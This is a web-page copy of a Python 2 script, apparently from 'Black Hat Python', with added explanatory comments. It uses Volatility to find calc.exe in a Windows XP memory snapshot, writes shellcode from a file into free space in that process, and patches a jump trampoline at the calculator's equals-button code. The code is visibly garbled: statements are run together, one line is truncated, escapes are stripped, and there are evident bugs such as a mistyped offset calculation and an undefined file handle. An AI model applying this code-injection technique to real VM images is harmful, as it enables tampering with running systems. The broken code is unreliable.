python计算机内存取证,Python黑帽子:自动化内存取证

#coding=utf-8

# Python 2 script (whitespace-mangled by the page: several statements are run
# together on single lines, one line is truncated, and the byte-string escapes
# look stripped) that drives Volatility 2.3.1 against a Windows XP SP3 memory
# snapshot: it locates the calc.exe process, scans that process's pages for a
# gap large enough to hold the contents of cmeasure.bin, writes those bytes into
# the snapshot file, then writes a short trampoline at the physical offset it
# computes from `equals_button`.
# Forensic note: the snapshot is opened "r+" and modified in place, so after a
# run it is no longer a faithful acquisition and any integrity hash recorded
# for the image beforehand will not match. Work on a copy; keep the original.
importsysimportstruct  # two import statements run together by the page

# Three assignments run together: the virtual address the trampoline targets,
# the snapshot file that is read and written, and the slot that later holds the
# virtual address chosen for the payload (None until found).
equals_button= 0x01005D51memory_file= "WinXPenSP3-Snapshot8.vmem"slack_space=None

# Physical file offset the trampoline is written to; filled in during the scan.
trampoline_offset=None# read in our shellcode

# The payload bytes come from a file on disk next to the script.
sc_fd = open("cmeasure.bin","rb")

sc=sc_fd.read()

sc_fd.close()

# Volatility is loaded from a hard-coded local path; three statements run together.
sys.path.append("C:\Python27\volatility-2.3.1")importvolatility.conf as confimportvolatility.registry as registry

registry.PluginImporter()  # presumably loads Volatility's plugin registry — confirm against the 2.3.1 API

# Build the Volatility config object (two imports are run together on this line).
config=conf.ConfObject()importvolatility.commands as commandsimportvolatility.addrspace as addrspace

config.parse_options()

# Profile for the image and its location as a file:// URL; a further import is run together here.
config.PROFILE= "WinXPSP3x86"config.LOCALTION= "file://%s"%memory_fileimportvolatility.plugins.taskmods as taskmods

# Walk the process list (PSList) and act only on calc.exe; take its address space.
p=taskmods.PSList(config)for process inp.calculate():if str(process.ImageFileName) == "calc.exe":print "[*] Found calc.exe with PID %d"%process.UniqueProcessIdprint "[*] Hunting for physical offsets...please wait."address_space=process.get_process_address_space()

# Each page is used below as page[0] = virtual address, page[1] = length to read.
pages=address_space.get_available_pages()for page inpages:

# Translate the page's virtual address to a physical offset; the gap search
# below runs only until the first usable location is recorded in slack_space.
physical=address_space.vtop(page[0])if physical is notNone:if slack_space isNone:

# Read this page's backing bytes directly out of the snapshot file.
fd= open(memory_file,"r+")

fd.seek(physical)

buf= fd.read(page[1])try:

# Search the page for a run as long as the payload; str.index raises
# ValueError when it is absent. As printed, the pattern is the literal text
# "x00" repeated — the escape appears to have been lost by the page.
offset= buf.index("x00"*len(sc))

# Record the virtual address of the gap and report both addresses.
slack_space= page[0] +offsetprint "[*] Found good shellcode location!"

# Overwrite the gap in the snapshot file with the payload bytes.
print "[*] Virtual address: 0x%08x"%slack_spaceprint "[*] Physical address: 0x%08x"%(physical +offset)print "[*] Injecting shellcode."fd.seek(physical+offset)

fd.write(sc)

fd.close()# build our trampoline code

# Truncated on the page: the struct.pack() call that builds the trampoline's
# operand is incomplete here, so this statement cannot be read as shown.
tramp = "xbb%s"%struct.pack("

tramp+= "xffxe3"  # remaining trampoline bytes (escapes also appear stripped)

# Stop scanning once both the payload location and the trampoline offset are known.
if trampoline_offset is notNone:break

# NOTE(review): the bare except swallows everything, not only the expected
# ValueError from .index — an I/O error from the seek/write above would be
# silently lost as well. Translated: check where the target code lives.
except:passfd.close()# check where the target code lives

# Does this page contain equals_button with at least 7 bytes of room after it?
# — compute the virtual offset
if page[0] <= equals_button and equals_button < ((page[0] + page[1]) - 7):print "[*] Found our trampoline target at: 0x%08x"%(physical)# compute the virtual offset

v_offset = equals_button =page[0]# compute the physical offset

# Physical offset for the trampoline; leave the page loop once the payload location is also known.
trampoline_offset = physical +v_offsetprint "[*] Found our trampoline target at: 0x%08x"%(trampoline_offset)if slack_space is notNone:break

# Second pass over the snapshot file: write the trampoline bytes at the computed offset.
print "[*] Writing trampoline..."fd= open(memory_file,"r+")

fd.seek(trampoline_offset)

fd.write(tramp)

f.close()print "[*] Done injecting code."
